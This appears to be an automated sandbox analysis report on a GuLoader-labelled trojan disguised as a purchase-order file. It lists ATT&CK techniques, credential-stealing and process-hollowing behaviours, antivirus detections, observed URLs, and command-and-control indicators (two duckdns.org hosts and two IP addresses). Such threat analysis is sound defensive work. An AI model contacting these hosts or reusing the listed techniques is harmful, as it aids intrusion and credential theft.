              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword138_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe PID: 732, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe PID: 7048, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kajsoiestc.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts11
              Native API
              11
              Scripting
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              212
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              18
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              112
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              File Deletion
              LSA Secrets221
              Security Software Discovery
              SSH2
              Clipboard Data
              Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading
              Cached Domain Credentials13
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Time Based Evasion
              Network Sniffing1
              Time Based Evasion
              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432013 Sample: PURCHASEORDERSHEET&SPECIFIC... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 52 janbours92harbu02.duckdns.org 2->52 54 janbours92harbu01.duckdns.org 2->54 56 geoplugin.net 2->56 64 Snort IDS alert for network traffic 2->64 66 Multi AV Scanner detection for dropped file 2->66 68 Multi AV Scanner detection for submitted file 2->68 72 8 other signatures 2->72 8 PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe 4 42 2->8         started        signatures3 70 Uses dynamic DNS services 54->70 process4 file5 42 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->42 dropped 44 C:\Users\user\AppData\Local\...\System.dll, PE32 8->44 dropped 82 Detected unpacking (changes PE section rights) 8->82 84 Tries to steal Mail credentials (via file registry) 8->84 86 Obfuscated command line found 8->86 88 2 other signatures 8->88 12 PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe 7 19 8->12         started        17 cmd.exe 8->17         started        19 cmd.exe 8->19         started        21 62 other processes 8->21 signatures6 process7 dnsIp8 58 janbours92harbu01.duckdns.org 172.94.9.228, 3980, 50301, 50302 VOXILITYGB United States 12->58 60 94.156.8.104, 50300, 80 NET1-ASBG Bulgaria 12->60 62 geoplugin.net 178.237.33.50, 50303, 80 ATOM86-ASATOM86NL Netherlands 12->62 46 C:\Users\user\AppData\Local\...behaviorgraphutte.exe, PE32 12->46 dropped 48 C:\Users\user\AppData\...\kajsoiestc.dat, data 12->48 dropped 50 C:\Users\user\AppData\Local\...\rrrsyhb.vbs, data 12->50 dropped 90 Maps a DLL or memory area into another process 12->90 92 Sample uses process hollowing technique 12->92 94 Hides threads from debuggers 12->94 96 Installs a global keyboard hook 12->96 23 PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe 12->23         started        26 PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe 12->26         started        28 PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe 12->28         started        30 wscript.exe 12->30         started        32 Conhost.exe 17->32         started        34 Conhost.exe 19->34         started        36 Conhost.exe 21->36         started        38 Conhost.exe 21->38         started        40 60 other processes 21->40 file9 signatures10 process11 signatures12 74 Tries to steal Instant Messenger accounts or passwords 23->74 76 Tries to steal Mail credentials (via file / registry access) 23->76 78 Tries to harvest and steal browser information (history, passwords, etc) 26->78 80 Deletes itself after installation 30->80

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe19%VirustotalBrowse
              PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe13%ReversingLabsWin32.Trojan.Guloader
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\System.dll1%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nsuBDCD.tmp\nsExec.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\weltervgter\Gutte.exe13%ReversingLabsWin32.Trojan.Guloader
              No Antivirus matches
              SourceDetectionScannerLabelLink
              geoplugin.net4%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://csp.withgoogle.com/csp/ads-programmable0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
              https://odc.offi0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%VirustotalBrowse
              https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/ads-programmable0%VirustotalBrowse
              https://csp.withgoogle.com/csp/botguard-scs0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%Avira URL Cloudsafe
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%Avira URL Cloudsafe
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%Avira URL Cloudsafe
              https://btloader.com/tag?o=6208086025961472&upapi=true0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo0%VirustotalBrowse
              https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl0%VirustotalBrowse
              https://contextual.med0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/botguard-scs0%VirustotalBrowse
              http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl00%VirustotalBrowse
              https://btloader.com/tag?o=6208086025961472&upapi=true0%VirustotalBrowse
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%Avira URL Cloudsafe
              http://ocsp.sca1b.amazontrust.com060%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://pki.goog/repository/00%Avira URL Cloudsafe
              http://crl.rootg2.amazontrust.com/rootg2.crl00%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b70%VirustotalBrowse
              https://tpc.g0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%20%VirustotalBrowse
              http://crl.rootg2.amazontrust.com/rootg2.crl00%VirustotalBrowse
              https://2542116.fls.doublecli0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%VirustotalBrowse
              https://pki.goog/repository/00%VirustotalBrowse
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
              http://crl.pki.goog/gsr1/gsr1.crl0;0%Avira URL Cloudsafe
              http://ocsp.sectigo.com00%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat0%VirustotalBrowse
              https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/botguard-scs0%VirustotalBrowse
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der070%Avira URL Cloudsafe
              https://2542116.fls.double0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZE0%VirustotalBrowse
              http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl00%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%Avira URL Cloudsafe
              http://pki.goog/gsr1/gsr1.crt020%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%Avira URL Cloudsafe
              https://csp.withgoogle.com/csp/report-to/adspam-signals-scs0%VirustotalBrowse
              https://sb.scorecardresearch.com/beacon.js0%VirustotalBrowse
              http://pki.goog/gsr1/gsr1.crt020%VirustotalBrowse
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              http://pki.goog/repo/certs/gts1c3.der0$0%VirustotalBrowse
              https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.0%VirustotalBrowse
              https://get3.adobe0%Avira URL Cloudsafe
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%VirustotalBrowse
              http://pki.goog/repo/certs/gts1c3.der071%VirustotalBrowse
              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%VirustotalBrowse
              http://crl.pki.goog/gsr1/gsr1.crl0;0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              janbours92harbu01.duckdns.org
              172.94.9.228
              truetrue
                unknown
                geoplugin.net
                178.237.33.50
                truefalseunknown
                janbours92harbu02.duckdns.org
                unknown
                unknowntrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://odc.offiPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhvAF21.tmp.137.drfalse
                    high
                    http://www.imvu.comrPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhvAF21.tmp.137.drfalse
                      high
                      https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhvAF21.tmp.137.drfalse
                        high
                        https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhvAF21.tmp.137.drfalse
                          high
                          https://csp.withgoogle.com/csp/ads-programmablebhvAF21.tmp.137.drfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.nirsoft.netPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267131156.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                            high
                            https://aefd.nelreports.net/api/report?cat=bingaotakbhvAF21.tmp.137.drfalse
                            • 0%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            unknown
                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhvAF21.tmp.137.drfalse
                              high
                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhvAF21.tmp.137.drfalse
                                high
                                https://deff.nelreports.net/api/report?cat=msnbhvAF21.tmp.137.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.google.com/chrome/PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                  high
                                  http://cdp.thawte.com/ThawteRSACA2018.crl0LbhvAF21.tmp.137.drfalse
                                    high
                                    https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7bhvAF21.tmp.137.drfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.google.com/recaptcha/apiPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://csp.withgoogle.com/csp/botguard-scsbhvAF21.tmp.137.drfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-aclbhvAF21.tmp.137.drfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258bhvAF21.tmp.137.drfalse
                                        high
                                        https://www.google.com/chrome/https://PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0bhvAF21.tmp.137.drfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.msn.combhvAF21.tmp.137.drfalse
                                            high
                                            https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80bhvAF21.tmp.137.drfalse
                                              high
                                              https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhvAF21.tmp.137.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://btloader.com/tag?o=6208086025961472&upapi=truebhvAF21.tmp.137.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.imvu.comataPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238594128.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238516037.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhvAF21.tmp.137.drfalse
                                                high
                                                https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgbhvAF21.tmp.137.drfalse
                                                  high
                                                  https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FACbhvAF21.tmp.137.drfalse
                                                    high
                                                    https://contextual.medPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhvAF21.tmp.137.drfalse
                                                    • 0%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhvAF21.tmp.137.drfalse
                                                      high
                                                      http://ocsp.sca1b.amazontrust.com06bhvAF21.tmp.137.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://certs.godaddy.com/repository/1301bhvAF21.tmp.137.drfalse
                                                        high
                                                        http://www.imvu.comPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238594128.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000003.56238516037.0000000000B3D000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://contextual.media.net/checksPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://ocsp.rootca1.amazontrust.com0:bhvAF21.tmp.137.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://certs.godaddy.com/repository/0bhvAF21.tmp.137.drfalse
                                                              high
                                                              https://pki.goog/repository/0bhvAF21.tmp.137.drfalse
                                                              • 0%, Virustotal, Browse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.msn.com/bhvAF21.tmp.137.drfalse
                                                                high
                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhvAF21.tmp.137.drfalse
                                                                  high
                                                                  http://cacerts.thawte.com/ThawteRSACA2018.crt0bhvAF21.tmp.137.drfalse
                                                                    high
                                                                    http://crl.godaddy.com/gdroot-g2.crl0FbhvAF21.tmp.137.drfalse
                                                                      high
                                                                      http://crl.rootg2.amazontrust.com/rootg2.crl0bhvAF21.tmp.137.drfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                        high
                                                                        http://nsis.sf.net/NSIS_ErrorPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, Gutte.exe.135.drfalse
                                                                          high
                                                                          https://www.msn.com/?ocid=iehpPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56257688648.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56257353168.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                            high
                                                                            https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhvAF21.tmp.137.drfalse
                                                                              high
                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhvAF21.tmp.137.drfalse
                                                                                high
                                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhvAF21.tmp.137.drfalse
                                                                                • 0%, Virustotal, Browse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.google.com/accounts/serviceloginPURCHASEORDERSHEET&SPECIFICATIONSDOC.exefalse
                                                                                  high
                                                                                  http://trc.taboola.com/p3p.xmlbhvAF21.tmp.137.drfalse
                                                                                    high
                                                                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhvAF21.tmp.137.drfalse
                                                                                      high
                                                                                      https://tpc.gPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://2542116.fls.doublecliPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platbhvAF21.tmp.137.drfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://crl.pki.goog/gsr1/gsr1.crl0;bhvAF21.tmp.137.drfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhvAF21.tmp.137.drfalse
                                                                                        high
                                                                                        http://crl.godaddy.com/gdig2s1-2558.crl0bhvAF21.tmp.137.drfalse
                                                                                          high
                                                                                          http://ocsp.sectigo.com0bhvAF21.tmp.137.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://csp.withgoogle.com/csp/report-to/botguard-scsbhvAF21.tmp.137.drfalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/de-ch/https://PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://certificates.godaddy.com/repository/0bhvAF21.tmp.137.drfalse
                                                                                              high
                                                                                              https://aefd.nelreports.net/api/report?cat=bingthbhvAF21.tmp.137.drfalse
                                                                                              • 0%, Virustotal, Browse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhvAF21.tmp.137.drfalse
                                                                                                high
                                                                                                https://eb2.3lift.com/sync?PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                                                  high
                                                                                                  https://acdn.adnxs.com/dmp/async_usersync.htmlbhvAF21.tmp.137.drfalse
                                                                                                    high
                                                                                                    https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhvAF21.tmp.137.drfalse
                                                                                                      high
                                                                                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QUZEbhvAF21.tmp.137.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhvAF21.tmp.137.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhvAF21.tmp.137.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://pki.goog/repo/certs/gts1c3.der07bhvAF21.tmp.137.drfalse
                                                                                                      • 1%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56259919390.0000000002351000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56258217273.0000000002B41000.00000004.00000020.00020000.00000000.sdmp, bhvAF21.tmp.137.drfalse
                                                                                                        high
                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhvAF21.tmp.137.drfalse
                                                                                                          high
                                                                                                          https://www.google.com/paPURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261621757.000000000235C000.00000004.00000020.00020000.00000000.sdmp, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000003.56261732294.000000000235C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhvAF21.tmp.137.drfalse
                                                                                                              high
